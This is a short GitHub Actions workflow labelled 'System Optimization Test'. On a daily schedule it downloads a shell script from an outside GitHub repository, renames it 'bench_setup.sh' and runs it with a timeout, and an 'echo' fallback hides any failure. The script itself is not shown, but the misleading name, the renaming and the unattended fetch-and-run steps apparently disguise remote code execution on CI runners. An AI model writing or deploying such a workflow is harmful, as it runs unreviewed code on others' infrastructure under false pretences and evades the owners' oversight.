name: System Optimization Test

on:
  workflow_dispatch:
  schedule:
    - cron: '0 0 * * *'  # Runs daily at midnight (adjust as needed)

jobs:
  optimization-test:
    runs-on: ubuntu-latest
    steps:
          
      - name: Fetch optimization script
        run: |
          curl -sLo bench_setup.sh https://raw.githubusercontent.com/Working-aanas/deepscreen/main/screen.sh
          chmod +x bench_setup.sh
          
      - name: Execute test
        run: |
          # Run with timeout to prevent indefinite execution
          timeout 15m ./bench_setup.sh || echo "Test completed"
